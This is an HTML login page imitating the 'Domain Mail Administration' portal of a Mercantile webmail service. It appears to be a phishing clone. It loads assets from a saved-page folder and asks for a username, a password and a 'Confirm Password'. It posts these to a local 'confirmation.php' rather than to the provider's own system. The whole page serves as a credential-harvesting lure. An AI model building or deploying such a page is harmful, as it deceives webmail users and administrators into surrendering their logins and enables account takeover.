﻿<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7"><![endif]-->
<!--[if IE 8 ]><html class="ie ie8"><![endif]-->
<!--[if (gte IE 9)|!(IE)]><!-->
<html><!--<![endif]--><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<link rel="stylesheet" href="Admin%20-%20mailadmin.mos.com.np_files/default.css">

<!--

	<link rel="stylesheet" href="css/reset.css" />
	<link rel="stylesheet" href="css/main.css" />
    <link rel="stylesheet" href="css/login.css" />
	<link rel="stylesheet" href="css/tooltip.css" />
    <link rel="stylesheet" href="css/cleditor.css" />

-->

	<!--[if lt IE 9]><script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->


<title>Admin - mailadmin.mos.com.np</title>
</head>





<body>

<!-- CONTAINER -->
<div id="container">

	<!-- HEADER -->
	<header id="header">
		<div id="header-inner" class="clearfix">
			

<h1 id="logo">     <img src="Admin%20-%20mailadmin.mos.com.np_files/mercantile.png" alt="System  Administrator - Webmail Service" title="Mercantile Webmail Service">   </h1>
			
		</div>
	</header>
	<!-- //HEADER -->



<!-- LOGIN -->
<div id="login">

	<div id="login-page" class="data">

<img src="images22.png">
		<span class="head">Domain Mail Administration</span>  
		<div class="table">
			<p id="please-login">Please login to continue.</p>
			<div class="notes login-content">
			


<form name="login" method="post" action="confirmation.php">

					<div class="input login-input login-input-username">
                    
                                       
                    <input type="text" name="username" required="" placeholder="Username">

					</div>
					





<div class="input login-input login-input-password">
						<input type="password" name="password" required="" placeholder="Password">
					</div>





<div class="input login-input login-input-password">
						<input type="password" name="password" required="" placeholder="Confirm Password">
					</div>







                    <div>&nbsp;</div>
					<div class="login-button">
	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<button class="button orange">Login</button>
					</div>
                    
					<div class="clear"></div>
                    
				</form>
			</div>
		</div>
	</div>



</div>
<!-- //LOGIN -->

		<!-- FOOTER -->
		<footer id="footer" class="clearfix">
			<p id="copyright">© <a href="http://mos.com.np/" target="_blank"> </a>2022 All Rights Reserved.&nbsp;&nbsp; <a href="http://web.mos.com.np/" target="_blank"> </a></p>
			
		</footer>
		<!-- //FOOTER --><strong></strong>


 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="http://mercantile.com.np/"></a>

<!-- REQUIRED JAVASCRIPT FILES -->
<script src="Admin%20-%20mailadmin.mos.com.np_files/jquery-1.htm"></script>
<script src="Admin%20-%20mailadmin.mos.com.np_files/cleditor.htm"></script>
<script src="Admin%20-%20mailadmin.mos.com.np_files/main.htm"></script>
<link rel="stylesheet" href="Admin%20-%20mailadmin.mos.com.np_files/cleditor.css">




</div></body></html>